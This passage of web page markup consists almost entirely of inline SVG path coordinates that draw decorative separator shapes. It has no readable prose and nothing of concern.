d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n </svg>\n </div>\n <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,